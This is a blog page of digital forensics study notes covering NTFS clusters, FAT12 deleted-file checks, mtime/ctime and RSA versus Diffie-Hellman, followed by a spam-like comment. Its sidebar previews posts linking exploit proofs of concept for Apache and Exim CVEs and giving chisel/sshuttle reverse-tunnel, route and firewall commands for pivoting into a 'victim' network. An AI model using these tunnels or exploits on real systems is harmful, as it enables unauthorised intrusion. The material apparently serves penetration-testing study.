Skip to main content

Study Forensics

Timeline Analysis OLD

Log 2 Timeline CheatSheet

Registry Hive Microsoft  Registry Hive Explanation
Ram Slack - File Slack One More

NTFS File Structure

1) Forensics Basics - Breach Detection (Useful)

2) Linux Inode

3) Fat and Fat Directory Entries 

4) Fat12
Offset and Advances Stuff
RSA is a protocol which is used for signing or encryption. On the other hand,
Diffie-Hellman is a protocol which is used for exchange of key. Also, the RSA 
will expect that you have all the key materials with you beforehand, which is 
not the case with Diffie-Hellman.
NTFS divides all useful place into clusters - data blocks used at a time. 
NTFS supports almost all sizes of clusters - from 512 bytes up to 64 KBytes. 
The 4 KBytes cluster is considered to be some standard. 
Modify is the time-stamp of the last time the file's content has been modified.
This is called "mtime".
"Change" is the time-stamp of the last time the file's inode has been changed, like by changing permissions, ownership, file name, number of hard links. It's often called "ctime".

How would you be able to tell at the hex level that a file has been deleted in FAT12?

Run fsstat against the FAT partition to gather details. Run fls to get information about the image files. This will return information about deleted files and the metatdata information.

Comments

  1. Excellent post. I really enjoy reading and also appreciate your work.Breach Detection Services This concept is a good way to enhance knowledge. Keep sharing this kind of articles, Thank you.

    ReplyDelete

Post a Comment

Popular posts from this blog

POC Links for CVE's

  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main

Pivoting into an internal network behind firewall

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT ...